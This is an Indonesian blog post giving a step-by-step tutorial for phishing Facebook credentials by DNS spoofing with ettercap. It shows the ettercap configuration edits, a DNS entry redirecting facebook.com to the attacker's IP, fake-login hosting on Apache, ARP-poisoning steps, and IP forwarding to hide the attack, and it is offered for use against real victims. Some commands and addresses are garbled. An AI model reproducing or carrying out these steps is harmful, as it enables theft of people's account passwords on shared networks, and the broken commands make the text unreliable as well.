Kamis, Mei 26

Implimentasi pishing dengan DNS spoofing

mungkin ini jarang orang dengar gituuu ...
yang kebiasaan orang dengar sih etercap untuk hack fb orang tap ini lain gan ...
jadi yang saya maksud seperti judul itu sam dengan ettercap . namun pada dasar nya ettercap yang
bisa curi curi curi password facebook itu ,
tapi tehnik ini langsung mencuri password nya dari server / router . kebiasaan orang mencuri password orang dengan tehnik arpspoofing cuman ngelakuinnya 1 persatu dari client yang connect dengan AP router / server nya .
hal yang prlu disiapkan

  • persiapan 

1 . apache server ( sudo apt-get install apache2)
2 . php (sudo apt-get install php5)
3 . ettercap (sudo apt-get install ettercap)
4 . scribt pishing nya . contoh nya FAKE login facebook '
5 . airkopi segelas dengan snacke
 
oke next step
sekarang kita akan mencoba untuk mengecek apache2 apakah berjalan . coba aja ketik di browser yang agan gunakan localhost apabila ada tulisan its work . maka apache2 anda berjalan

jadi sekarang kita tinggal

  •        configure 
pengaturan ini sangat penting di jalankan .
edit file di /etc/etter.conf
selanjut nya cari barisan ini 
  #---------------
  #     Linux 
  #---------------

 # if you use ipchains:
    redir_command_on = "ipc198.182.196.5 6hains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
    redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

 # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j   
      REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j   
      REDIRECT --to-port %rport"

jadi hilang kan tanda pagarnya (#) sehinnga menjadi seperti yang dia atas itueee
jangan lupa save 

dan sekarang kita harus juga mengedit file di /usr/share/ettercap/etter.dns

microsoft.com      A   198.182.196.56
*.microsoft.com    A   198.182.196.56
www.microsoft.com  PTR 198.182.196.56      # Wildcards in PTR are not allowed

menjadi 

facebook.com      A   198.182.196.56
*facebook.com.com    A   198.182.196.56
www.facebook.com  PTR 198.182.196.56      # Wildcards in PTR are not allowed

facebook.com (site yang ingin kita pishing)

198.182.196.5 6( ip attacker )

sekrrang chmod file password di var/www supaya bisa di eksikusi
sudo /var/www/touch file password.txt
sudo /var/www/chmod file password.txt

jadi misalkan ip ente 192.168.1.45 maka ubahlah 192.168.195.56 menjadi 192.168.1.45
untuk mengecek ip kita bisa ketik di terminal ifconfig maka akan keluar ip anda

sekarang copykan FAKE login anda ke /var/www/   , 

  •     eksikusi

dan sekarang buka ettercap anda lewat terminal .
sudo ettercap -C -i (interace network)  
contoh sudo ettercap -C -i wlan0
dan sekarang keluar dah ettercap nya  , lalu pilih di tap sniif > unified sniffing > dan pilih interface anda
selanjutnya ke tab host > scan host dan maka akan keluar ip client yang connect ke AP router nya
kemudian ke tab pluging > manage pluging dan aktifkan autoadd & dns spoof
selanjut nya pilih ke tab mitm dan centang arp poisoning dan terakir ke tab start > plih start sniffing 
dan sekrang untuk menghilangkan jejak nya kita harus menyamar sebagai router acces point nya
sudo gedit /proc/sys/net/ipv4/ip_forward ( enter ) masukan pass laptob ente
ganti angka 0 menjadi 1 



  •      selesai
dan sekarang tinggal tunggu ajja . . . . 
tunnggu barang 10 menitan ane jamin sih facebook client udah ada sama kita
jadi password and email nya terletak di /var/www/ 
disitulah file nya . jadi buka file yang ber eksikusi passwordnya 
okeeeee dah





Tidak ada komentar:

Posting Komentar